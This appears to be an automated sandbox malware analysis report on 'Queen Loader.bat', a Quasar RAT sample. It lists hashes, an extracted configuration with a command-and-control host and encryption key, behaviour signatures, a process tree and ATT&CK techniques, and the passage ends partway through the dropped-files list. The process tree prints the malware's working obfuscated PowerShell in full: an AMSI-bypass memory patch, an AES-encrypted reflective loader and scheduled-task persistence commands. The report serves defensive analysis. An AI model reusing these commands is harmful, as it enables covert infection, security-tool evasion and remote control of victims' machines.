Analysis

  • max time kernel
    279s
  • max time network
    279s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-05-2024 15:23

General

  • Target

    Queen Loader.bat

  • Size

    1002KB

  • MD5

    f6d5bfaee8a55ff72c7b453fda066d62

  • SHA1

    7d737d53013990e5d05076b7206e43eb4793fc7f

  • SHA256

    3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308

  • SHA512

    e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284

  • SSDEEP

    12288:NzPPeJOTZMGuIl99I2FxGwvYXDSeengmfn5tKvy0H5JbcGfRZIJZ32hxnQxCGaF9:NDeYum99IGP8f2rRO5JFPIJZ8GaF8XmB

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Extracted

Family

quasar

Version

3.1.5

Botnet

Video

C2

runderscore00-25501.portmap.host:25501

Mutex

$Sxr-oWTh3ZS9htfe80iIl5

Attributes
  • encryption_key

    zK8u0rpHf4TJzGf65Flt

  • install_name

    Win11.exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 11 Boot

  • subdirectory

    Win11

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:632
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:552
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{fd69fb5a-6762-4b72-aaf4-c669e1fffa7e}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3512
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:684
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:996
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:452
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:704
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1068
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1076
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1156
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ycHrhRKkEkQe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kgNiAweiPHvOvw,[Parameter(Position=1)][Type]$CIuQyREIAp)$tbHodKdPXSz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+[Char](116)+''+'e'+''+'d'+''+[Char](68)+'e'+'l'+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+'l'+'e'+'',$False).DefineType('M'+'y'+''+[Char](68)+'ele'+'g'+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+'l'+'a'+'s'+'s,'+'P'+'u'+[Char](98)+'lic,'+[Char](83)+'e'+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+''+[Char](105)+'Cl'+[Char](97)+'s'+'s'+',A'+[Char](117)+''+[Char](116)+'oC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$tbHodKdPXSz.DefineConstructor(''+'R'+''+'T'+'Spe'+[Char](99)+''+'i'+''+[Char](97)+'l'+'N'+''+[Char](97)+'m'+'e'+''+','+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+''+[Char](103)+','+'P'+'u'+[Char](98)+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kgNiAweiPHvOvw).SetImplementationFlags('Run'+'t'+'im'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$tbHodKdPXSz.DefineMethod('I'+'n'+''+'v'+'o'+'k'+'e',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+'S'+''+'l'+''+'o'+'t'+','+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$CIuQyREIAp,$kgNiAweiPHvOvw).SetImplementationFlags('R'+[Char](117)+'nt'+[Char](105)+''+[Char](109)+'e'+','+'M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+'d');Write-Output $tbHodKdPXSz.CreateType();}$LEnQRauVjJwpI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+'t'+'em'+'.'+''+'d'+''+[Char](108)+'l')}).GetType('M'+'i'+'c'+'r'+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+'n'+'3'+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+'s'+'a'+''+[Char](102)+''+'e'+''+'N'+'a'+'t'+''+'i'+'veM'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+'s'+'');$GQedneLYUSiMlH=$LEnQRauVjJwpI.GetMethod(''+'G'+'et'+[Char](80)+''+'r'+'o'+'c'+'Ad'+[Char](100)+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'St'+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wxzAdGlchTlRSXAzXKO=ycHrhRKkEkQe @([String])([IntPtr]);$uBACIJYkwVYUyHWDIjYrSl=ycHrhRKkEkQe @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$tCWeDoCzicp=$LEnQRauVjJwpI.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Mo'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'Ha'+'n'+'dle').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+'l'+'l'+'')));$ycwuvRJIQnjanA=$GQedneLYUSiMlH.Invoke($Null,@([Object]$tCWeDoCzicp,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+'A')));$MVPYxmnBfztIDtlFA=$GQedneLYUSiMlH.Invoke($Null,@([Object]$tCWeDoCzicp,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'tua'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+'t')));$rnbQfBx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ycwuvRJIQnjanA,$wxzAdGlchTlRSXAzXKO).Invoke('a'+[Char](109)+'si.'+'d'+''+'l'+''+[Char](108)+'');$vYOgJEtsrYmfGNWzj=$GQedneLYUSiMlH.Invoke($Null,@([Object]$rnbQfBx,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+'S'+[Char](99)+'a'+[Char](110)+'B'+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+'r'+'')));$htkrCAunDV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MVPYxmnBfztIDtlFA,$uBACIJYkwVYUyHWDIjYrSl).Invoke($vYOgJEtsrYmfGNWzj,[uint32]8,4,[ref]$htkrCAunDV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vYOgJEtsrYmfGNWzj,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MVPYxmnBfztIDtlFA,$uBACIJYkwVYUyHWDIjYrSl).Invoke($vYOgJEtsrYmfGNWzj,[uint32]8,0x20,[ref]$htkrCAunDV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'77st'+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:3556
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1164
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1244
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1304
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1420
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1472
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2992
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                • Drops file in System32 directory
                                PID:1480
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1560
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1572
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                    1⤵
                                      PID:1688
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1708
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1756
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1848
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1868
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                              1⤵
                                                PID:1740
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1980
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1968
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:2068
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2136
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2180
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2360
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                            1⤵
                                                              PID:2472
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2480
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                1⤵
                                                                • Drops file in System32 directory
                                                                • Modifies data under HKEY_USERS
                                                                PID:2520
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                1⤵
                                                                  PID:2612
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2624
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2648
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                      1⤵
                                                                        PID:2676
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2692
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:3032
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:2600
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                                PID:3332
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Queen Loader.bat"
                                                                                  2⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2932
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Queen Loader.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Queen Loader.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                    3⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:5044
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_134_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_134.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                      4⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1408
                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_134.vbs"
                                                                                      4⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2800
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_134.bat" "
                                                                                        5⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4756
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          6⤵
                                                                                            PID:2340
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_134.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_134.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                            6⤵
                                                                                            • Blocklisted process makes network request
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3724
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2780
                                                                                            • C:\Users\Admin\AppData\Local\Temp\New.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\New.exe"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:380
                                                                                              • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                "SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST
                                                                                                8⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:3556
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                  1⤵
                                                                                    PID:3464
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                    1⤵
                                                                                      PID:3532
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:3908
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3948
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:4028
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                            1⤵
                                                                                              PID:4044
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                              1⤵
                                                                                                PID:4380
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                1⤵
                                                                                                  PID:4440
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                  1⤵
                                                                                                    PID:3196
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                    1⤵
                                                                                                      PID:1264
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                      1⤵
                                                                                                        PID:2684
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                        1⤵
                                                                                                          PID:1088
                                                                                                        • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                          "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                          1⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:3592
                                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:1060
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                            1⤵
                                                                                                              PID:2132
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:4900
                                                                                                              • C:\Windows\sysWOW64\wbem\wmiprvse.exe
                                                                                                                C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                1⤵
                                                                                                                  PID:3444
                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  1⤵
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks processor information in registry
                                                                                                                  PID:2936

                                                                                                                Network

                                                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                Execution

                                                                                                                Command and Scripting Interpreter

                                                                                                                1
                                                                                                                T1059

                                                                                                                PowerShell

                                                                                                                1
                                                                                                                T1059.001

                                                                                                                Scheduled Task/Job

                                                                                                                1
                                                                                                                T1053

                                                                                                                Persistence

                                                                                                                Scheduled Task/Job

                                                                                                                1
                                                                                                                T1053

                                                                                                                Privilege Escalation

                                                                                                                Scheduled Task/Job

                                                                                                                1
                                                                                                                T1053

                                                                                                                Discovery

                                                                                                                Query Registry

                                                                                                                2
                                                                                                                T1012

                                                                                                                System Information Discovery

                                                                                                                3
                                                                                                                T1082

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  5dc9a9599fb11ee70f9164d8fea15abf

                                                                                                                  SHA1

                                                                                                                  85faf41a206f3fa8b469609333558cf817df2cda

                                                                                                                  SHA256

                                                                                                                  3f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de

                                                                                                                  SHA512

                                                                                                                  499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                  Filesize

                                                                                                                  17KB

                                                                                                                  MD5

                                                                                                                  cd7b51fc93808bb92db6e25448700706

                                                                                                                  SHA1

                                                                                                                  a26a4d5954d18830edc2267cb5051daa6282c7ef

                                                                                                                  SHA256

                                                                                                                  dc5751d74af42e642422ae3250a5e1c4534433c6957c4aae9f851024cd8c5754

                                                                                                                  SHA512

                                                                                                                  61bf7a9f8e42f14aa507ad1d538d107d08262a7c8aaf6650151420ee4ad967a59b8ce020f097a60af0a81cd1d280ce508b942334ba2313ebc24e43fbb65cf628

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                                  Filesize

                                                                                                                  163KB

                                                                                                                  MD5

                                                                                                                  b51552b77057c2405f73bbbf9c89234a

                                                                                                                  SHA1

                                                                                                                  4793adbba023f90d2d2ad0ec55199c56de815224

                                                                                                                  SHA256

                                                                                                                  720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0

                                                                                                                  SHA512

